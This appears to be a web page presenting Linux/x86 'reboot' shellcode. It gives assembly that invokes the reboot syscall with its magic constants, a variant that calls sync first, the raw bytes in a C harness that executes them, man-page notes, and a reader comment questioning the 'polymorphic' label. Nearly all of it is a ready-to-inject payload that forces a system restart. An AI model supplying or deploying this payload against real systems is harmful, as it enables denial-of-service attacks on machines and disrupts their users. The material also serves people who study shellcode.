Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)

(Updated: )
,
reference Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
global _start

section .text
_start:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    cdq                  ; xor edx, edx
    mov al, 0x58         ; 88
    mov ebx, 0xfee1dead  ;
    mov ecx, 672274793   ; 0x28121969
    mov edx, 0x1234567   ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
    int 0x80             ;

From man 2 reboot:

magic magic2 cmd arg
LINUX_REBOOT_MAGIC1 (0xfee1dead) LINUX_REBOOT_MAGIC2 (672274793/0x28121969) LINUX_REBOOT_CMD_CAD_OFF (0, kill all, sync, reboot)
LINUX_REBOOT_MAGIC2A (85072278/0x05121996, since 2.1.17) LINUX_REBOOT_CMD_CAD_ON (0x89abcdef, `LINUX_REBOOT_CMD_RESTART`)
LINUX_REBOOT_MAGIC2B (369367448/0x16041998, since 2.1.97) LINUX_REBOOT_CMD_HALT (0xcdef0123, since 1.1.76, "System halted.", no `sync`)
LINUX_REBOOT_MAGIC2C (537993216/0x20112000, since 2.5.71) LINUX_REBOOT_CMD_KEXEC (0x45584543, since 2.6.13, execute a kernel that has been loaded earlier with `kexec_load`, kernel configured with `CONFIG_KEXEC`)
LINUX_REBOOT_CMD_POWER_OFF (0x4321fedc, since 2.1.30, "Power down.", no `sync`)
LINUX_REBOOT_CMD_RESTART (0x01234567, "Restarting system.", no `sync`)
LINUX_REBOOT_CMD_RESTART2 (0xa1b2c3d4, since 2.1.30, "Restarting system with comand '%s'", no `sync`) command string
LINUX_REBOOT_CMD_SW_SUSPEND (0xd000fce1, since 2.5.18, suspend (hibernate) to disk, kernel configured with `CONFIG_HIBERNATION`)

reboot:

1
2
3
4
#include <unistd.h>
#include <linux/reboot.h>

int reboot(int magic, int magic2, int cmd, void *arg);

sync:

1
2
3
#include <unistd.h>

void sync(void);

Here’s the modified version:

shellcode-2.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
global _start

section .text
_start:
    xor eax, eax
    mov al, 0x24
    int 0x80               ; sync()

    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    mov al, 0x58           ; sync() is always successful (0x0)
    mov ebx, 0xfee1dead
    mov ecx, 672274793
    mov edx, 0x1234567
    int 0x80               ; reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART)

Embbed the shellcode into C program:

shellcode.c
1
2
3
4
5
6
7
8
9
10
11
12
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x24\xcd\x80\x31\xdb\x31\xc9\x31\xd2\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

int main()
{
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
  • I don’t think it’s a polymorphic shellcode. Maybe it conatins cdq?